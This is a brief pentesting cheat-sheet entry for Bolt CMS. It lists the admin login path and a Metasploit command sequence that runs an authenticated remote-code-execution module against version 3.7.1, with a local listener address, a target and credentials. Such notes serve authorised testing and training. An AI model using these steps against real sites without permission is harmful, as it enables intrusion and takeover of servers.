# Bolt CMS Pentesting

Bolt is an open-source content management system based on PHP.

### Login Page <a href="#login-page" id="login-page"></a>

```
/bolt
```

### Remote Code Execution (v3.7.1) <a href="#remote-code-execution-v371" id="remote-code-execution-v371"></a>

```
msfconsole
msf> use exploit/unix/webapp/bolt_authenticated_rce
msf> set lhost <local-ip>
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> run
```